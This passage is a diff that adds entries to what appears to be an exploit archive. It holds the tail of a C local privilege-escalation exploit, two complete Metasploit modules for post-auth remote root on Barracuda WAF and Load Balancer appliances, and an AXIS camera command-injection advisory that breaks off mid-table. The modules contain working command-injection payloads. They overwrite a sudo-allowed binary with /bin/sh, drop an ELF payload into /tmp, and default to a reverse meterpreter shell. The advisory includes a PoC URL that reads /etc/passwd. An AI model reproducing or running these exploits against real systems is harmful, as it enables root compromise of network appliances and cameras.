+int main(int argc, char** argv) { + int hash_fd; + int fds[0x100]; + pid_t pid; + + hash_fd = open(HASH_PATH, O_RDONLY); + if (hash_fd < 0) { + err(-1, "failed to open HASH_PATH"); + } + + fprintf(stderr, "[*] forking to speed up initial reference count increments\n"); + for (int i = 0; i < 0xf; ++i) { + if (!fork()) { + add_references(hash_fd, 0x11111100); + exit(0); + } + } + + for (int i = 0; i < 0xf; ++i) { + int status; + wait(&status); + } + fprintf(stderr, "[*] initial reference count increase finished\n"); + + fprintf(stderr, "[*] entering profile\n"); + aa_change_profile("/sbin/dhclient"); + + pid = fork(); + if (pid) { + for (int i = 0; i < 0x100; ++i) { + fds[i] = open("/proc/self/net/arp", O_RDONLY); + } + } + else { + add_references(hash_fd, 0x100); + exit(0); + } + + fprintf(stderr, "[*] past the point of no return"); + sleep(5); + + for (int i = 0; i < 0x100; ++i) { + close(fds[i]); + } +} diff --git a/platforms/linux/remote/40176.rb b/platforms/linux/remote/40176.rb new file mode 100755 index 000000000..0f5ade743 --- /dev/null +++ b/platforms/linux/remote/40176.rb @@ -0,0 +1,253 @@ +# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3) +# Date: 07/28/16 +# Exploit Author: xort xort@blacksecurity.org +# Vendor Homepage: https://www.barracuda.com/ +# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall +# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.008 (2016-03-22) +# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.008 (2016-03-22) +# CVE : None. + +# vuln: UPDATE_va_other_options trigger exploit + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in the Barracuda Web App Firewall + Firmware Version <= 8.0.1.008 and Load Balancer Firmware <= v5.4.0.004 by exploiting a vulnerability + in the web administration interface. By sending a specially crafted request it's possible to inject + system commands while escalating to root do to relaxed sudo configurations on the applianaces. + }, + 'Author' => + [ + 'xort', # vuln + metasploit module + ], + 'Version' => '$Revision: 2 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Barracuda Web App Firewall Firmware Version <= 8.0.1.008 (2016-03-22)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl" + } + ], + + ['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd" + } + ], + ], + + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('ET', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'headers' => + { + 'Accept' => "application/json, text/javascript, */*; q=0.01", + 'Content-Type' => "application/x-www-form-urlencoded", + 'X-Requested-With' => "XMLHttpRequest" + }, + 'vars_post' => + { + + 'enc_key' => enc_key, + 'et' => et, + 'user' => "admin", # username, + 'password' => "admin", # password_clear, + 'enctype' => "none", + 'password_entry' => "", + 'login_page' => "1", + 'login_state' => "out", + 'real_user' => "", + 'locale' => "en_US", + 'form' => "f", + 'Submit' => "Sign in", + } + }, timeout) + + # get rid of first yank + password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + vprint_status( "Running Command...\n" ) + + # file to replace + sudo_cmd_exec = target['SudoCmdExec'] + #sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl" + #sudo_cmd_exec = "/home/product/code/firmware/current/bin/rdpd" + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + # random filename to dump too + 'tmp' HAS to be here. + b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + vprint_status(" file = " + b64dumpfile) + + # decoder stubs - tells 'base64' command to decode and dump data to temp file + b64decode1 = "echo \"" + b64decode2 = "\" | base64 -d >" + b64dumpfile + + # base64 - encode with base64 so we can send special chars and multiple lines + cmd = Base64.strict_encode64(cmd) + + # Create injection string. + # a) package the base64 decoder with encoded bytes + # b) attach a chmod +x request to make the script created (b64dumpfile) executable + # c) execute decoded base64 dumpfile + + injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile # + " ; rm " + b64dumpfile + + exploitreq = [ + [ "auth_type","Local" ], + [ "et",et ], + [ "locale","en_US" ], + [ "password", password ], + [ "primary_tab", "ADVANCE" ], + [ "realm","" ], + [ "secondary_tab","advanced_system" ], + [ "user", username ], + [ "timestamp", Time.now.to_i ], + + [ "UPDATE_va_other_options", "1" ], + [ "UPDATE_scan_information_in_use", "xx; #{injection_string}" ] # vuln + + ] + + boundary = "---------------------------" + Rex::Text.rand_text_numeric(34) + + post_data = "" + + exploitreq.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + post_data << "--#{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + } + }) + + end + + def run_script(username, password, et, cmds) + vprint_status( "running script...\n") + + + end + + def exploit + # timeout + timeout = 1550; + + user = "admin" + + # params + real_user = ""; + login_state = "out" + et = Time.now.to_i + locale = "en_US" + user = "admin" + password = "admin" + enctype = "MD5" + password_entry = "" + password_clear = "admin" + + if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty? + + password_clear = datastore['PASSWORD'] + password = datastore['PASSWORD'] +# et = datastore['ET'] + end + + password_hash, et = do_login(user, password_clear, et) + vprint_status("new password: #{password_hash} et: #{et}\n") + + sleep(5) + + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + run_command(user, password_hash, et, ("printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + handler + end + + + end + +end diff --git a/platforms/linux/remote/40177.rb b/platforms/linux/remote/40177.rb new file mode 100755 index 000000000..1831ae654 --- /dev/null +++ b/platforms/linux/remote/40177.rb @@ -0,0 +1,180 @@ +# Exploit Title: Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Remote Root Exploit +# Date: 07/28/16 +# Exploit Author: xort xort@blacksecurity.org +# Vendor Homepage: https://www.barracuda.com/ +# Software Link: https://www.barracuda.com/products/webapplicationfirewall +# Version: Web App Firewall Firmware <= 8.0.1.008 (2016-03-22) +# Tested on: Web App Firewall Firmware <= v8.0.1.008 (2016-03-22) +# CVE : None. + +# vuln: interface_stats + +require 'msf/core' +require 'date' +require "base64" + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Root Exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in the Barracuda Web + Application Firweall firmware versions <= v8.0.1.008 (2016-03-22) by exploiting a + vulnerability in the web administration interface. By sending a specially crafted + request it's possible to inject system commands while escalating to root do to relaxed + sudo configuration on the local machine. + }, + 'Author' => [ 'xort' ], # disclosure and exploit module + 'References' => [ [ 'none', 'none'] ], + 'Platform' => [ 'linux'], + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, + 'Targets' => [['Web Application Firewall <= v8.0.1.008 (2016-03-22)', {}]], + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Password', "admin" ]), + OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'headers' => + { + 'Accept' => "application/json, text/javascript, */*; q=0.01", + 'Content-Type' => "application/x-www-form-urlencoded", + 'X-Requested-With' => "XMLHttpRequest" + }, + 'vars_post' => + { + + 'enc_key' => enc_key, + 'et' => et, + 'user' => "admin", # username, + 'password' => "admin", # password_clear, + 'enctype' => "none", + 'password_entry' => "", + 'login_page' => "1", + 'login_state' => "out", + 'real_user' => "", + 'locale' => "en_US", + 'form' => "f", + 'Submit' => "Sign in", + } + }, timeout) + + # get rid of first yank + password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + + # file to replace + sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl" + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + vprint_status( "Running Command...\n" ) + + # random filename to dump too + 'tmp' HAS to be here. + b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + # decoder stubs - tells 'base64' command to decode and dump data to temp file + b64decode1 = "echo \"" + b64decode2 = "\" | base64 -d >" + b64dumpfile + + # base64 - encode with base64 so we can send special chars and multiple lines + cmd = Base64.strict_encode64(cmd) + + # Create injection string. + # a) package the base64 decoder with encoded bytes + # b) attach a chmod +x request to make the script created (b64dumpfile) executable + # c) execute decoded base64 dumpfile + + injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile + +# injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + + vprint_status( "sending..." ) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/cgi-mod/index.cgi", + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + }, + 'vars_get' => { + 'ajax_action' => 'interface_stats', + 'user' => username, + 'password' => password, + 'et' => et, + 'locale' => 'en_US', + 'realm' => '', + 'auth_type' => 'Local', + 'primary_tab' => 'BASIC', + 'secondary_type' => 'status', + + 'interface' => 'eth0' + '| ' + injection_string + ' |echo ' # vuln + } + }) + + end + + def exploit + + # params + timeout = 1550; + + real_user = ""; + et = Time.now.to_i + user = datastore['USERNAME'] + password = datastore['PASSWORD'] + + # do login and get password hash + password_hash, et = do_login(user, password, et) + vprint_status("got password hash: #{password_hash}\n") + sleep(2) + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + + handler + end + end +end diff --git a/platforms/linux/webapps/40171.txt b/platforms/linux/webapps/40171.txt new file mode 100755 index 000000000..d7b484260 --- /dev/null +++ b/platforms/linux/webapps/40171.txt @@ -0,0 +1,425 @@ + _ _ _ _ _ _ _ _ _ _ + / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ +( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 ) + \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ + + www.orwelllabs.com + security advisory + olsa-2015-8257 + PGP: 79A6CCC0 + + +* Advisory Information +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector +(+) Vendor: AXIS Communications +(+) Research and Advisory: Orwelllabs +(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html +(+) Class: Improper Input Validation [CWE-20] +(+) CVE Name: CVE-2015-8257 +(+) Remotely Exploitable: Yes +(+) Locally Exploitable: No +(+) OLSA-ID: OWLL2015-8257 +(+) Affected Versions: Multiple Products/Firmwares (check the list bellow) +(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization +(+) Owasp IoTTop10: I1, I2 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + +Vulnerability ++++++++++++++ +AXIS Network Cameras (various models/firmwares) are prone to Authenticated remote +command execution vulnerability. Exploiting this vulnerability a remote attacker can +force the execution of certain unauthorized actions, which may lead to further attacks. + +Technical Details ++++++++++++++++++ +The devtools.sh script is the responsible for vulnerability and it's 4 attack vectors through the following pages: + + +http://xxx.xxx.xxx.xxx/app_license.shtml?app= +http://xxx.xxx.xxx.xxx/app_license_custom.shtml?app= +http://xxx.xxx.xxx.xxx/app_index.shtml?app= +http://xxx.xxx.xxx.xxx/app_params.shtml?app= + + +An attacker can use the app parameter that waits for the name of a +legitimate application to inject commands in the operating system using +"%3B", for example, to read the contents of /etc/passwd: + +http: // +xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd + +The data entered in parameter "app =" is passed without any treatment for +devtools.sh script located at: {HTMLROOL}/bin/devtools.sh + +This script contains several functions, namely: + +list() +status() +menulist() +mainpagelink() +SETTINGSLINK() +confvariable() +echo_ssivar_licensekey() +load_auto_inst_form() + +When these functions are invoked, they interact with the parameters passed +by the web application through +the affected scripts (e.g. ap_license.shtml? App =). By injecting the code +below: + +http: // +xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd + +The value passed in "app" will be passed directly to the script invoking +devtools.sh via shell -c as shown in the listing process below (third line +invoking confvariable function): + +[SNIP] + 2039 led 25472 S /usr/bin/enldgts -n +12014 root 0 SW [kworker/0:0] +13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh +confvariable ORW.. +13183 root 2728 R ps -aux PACKAGENAME +13312 root 0 SW [kworker/3:1] +13320 root 0 SW [kworker/2:0] +[SNIP] + +The value "ORWELLLABS%3Bcat%20/etc/passwd" is then passed on to the +corresponding function (after passing through a conference on "confvariable +()"). + +confvariable() { +local val= +if [ -r "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" ]; then +. "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" || : +eval val=\$$2 +echo $val +fi +} + + +Then enter the function "menulist ()" which we see the main stretch located +between the lines 127 and 143: + +[SNIP] +127 [ "$ name", "/app_params.shtml", "app = $ APPNAME &" hostA, true false , null, +128 [ +129 [ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, true false +, null, []], +130 EOF +131 if [-z "$ LICENSEPAGE"] || [ "$ LICENSEPAGE" axis =]; Then +132 cat << - EOF +133 [ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, true false +, null, []], +134 EOF +135 fi +136 if [ "$ LICENSEPAGE" = custom] && [-r "$ HTMLROOT / local / $ APPNAME / +license.inc"]; Then +137 cat << - EOF +138 [ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, true +false , null, []], +139 EOF +140 fi +141 if [-r "$ HTMLROOT / local / $ APPNAME / about.inc"]; Then +142 cat << - EOF +143 [ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, true false , null, []], + + +Where the important lines are the menus below: + + +/bin/devtools.sh (127): +[ "$ Name", "/app_params.shtml", "app = $ APPNAME &" hostA, true -> false , null, +/bin/devtools.sh (129): +[ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, true false < ! - # endif +->, null, []], +/bin/devtools.sh (133): +[ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, true false , null, []], +/bin/devtools.sh (138): +[ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, true false , null, []], +/bin/devtools.sh (143): +[ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, false , null, []], + + +In PoC presented above, the payload will be triggered in line vector 133 of +devtools script ( "License" menu) that will: + + +[ "License", "/app_license.shtml", "app = ORWELLLABS% 3Bcat% 20 +/etc/passwd& "HostA, true false , null, []], + +And when executed echoes the results on the page. + + +Impact +++++++ +The impact of this vulnerability is that taking into account the busybox +that runs behind (and with root privileges everywhere. in all the binaries +and scripts) is possible to execute arbitrary commands, create backdoors, +performing a reverse connection to the machine attacker, use this devices +as botnets and DDoS amplification methods... the limit is the creativity of +the attacker. + + +Affected Products ++++++++++++++++++ +Multiple Axis Communications Products/Firmware including: + + * AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera - +Firmware 5.41.1.4 + * AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera - +Firmware 5.70.1.2 + * AXIS A8004-VE Network Video Door Station - +Firmware 5.85.1.1 + * AXIS P3384 fixed dome Network camera - +Firmware 6.10.1 + * AXIS P5532-E PTZ Dome Network Camera - +Firmware 5.41.3.1 + * AXIS Q60-E Network Dome PTZ - +Firmware 5.65.1.1, 5.41.*, 5.70.1.1 + * AXIS Q7401 Video Encoder - +Firmware 5.50.4 + * AXIS Q7404 Video Encoder - +Firmware 5.50.4.* + * AXIS Q7406 Blade Video Encoder - +Firmware 5.51.2 + * AXIS Q7411 Video Encoder - +Firmware 5.90.1 + * AXIS Q7414 Blade Video Encoder - +Firmware 5.51.2 + * AXIS Q7424-R Video Encoder - +Firmware 5.50.4 + * AXIS Q7424-R Mk II Video Encoder - +Firmware 5.51.3 + * AXIS Q7436 Blade Video Encoder - +Firmware 5.90.1 + + +The list bellow shows the firmwares affected (and probably these firmwares +are not available anymore, but just the last version of them, if you not +sure, check the hash). All these firmwares (in the second column) has the +same "devtools.sh" shellscript (responsible for trigger the RCE +vulnerability) embedded. The script can be found on directory: +"{HTMLROOT}/bin/devtools.sh". + +======================================================================== +PRODUCT FIRMWARE FIRMWARE HASH +======================================================================== +AXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a +AXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d +AXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10 +AXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921 +AXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7 +AXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12 +AXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12 +AXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e +AXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841 +AXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841 +AXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a +AXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e +AXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e +AXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e +AXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e +AXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928 +AXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928 +AXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b +AXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b +AXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7 +AXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7 +AXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866 +AXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65 +AXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811 +AXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e +AXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70 +AXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7 +AXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b +AXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6 +AXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d +AXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca +AXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509 +AXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d +AXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d +AXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d +AXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d +AXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61 +AXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61 +AXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205 +AXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205 +AXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d +AXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7 +AXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d +AXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979 +AXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866 +AXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866 +AXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866 +AXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60 +AXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60 +AXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939 +AXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969 +AXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb +AXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03 +AXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad +AXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f +AXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d +AXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6 +AXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af +AXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba +AXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c +AXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea +AXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474 +AXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4 +AXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4 +AXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6 +AXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6 +AXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56 +AXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a +AXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532 +AXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532 +AXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476 +AXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864 +AXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b +AXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e +AXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e +AXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2 +AXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00 +AXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d +AXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be +AXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be +AXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892 +AXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee +AXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee +AXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc +AXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749 +AXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271 +AXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8 +AXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727 +AXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106 +AXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0 +AXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698 +AXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611 +AXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf +AXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52 +AXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e +AXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313 +AXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188 +AXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1 +AXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1 +AXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81 +AXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863 +AXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d +AXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 +AXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 +AXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 +AXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9 +AXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409 +AXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1 +AXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83 +AXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0 +AXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd +AXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4 +AXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49 +AXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9 +AXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1 +AXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e +AXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688 +AXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d +AXIS Q3505 5.80.1.4 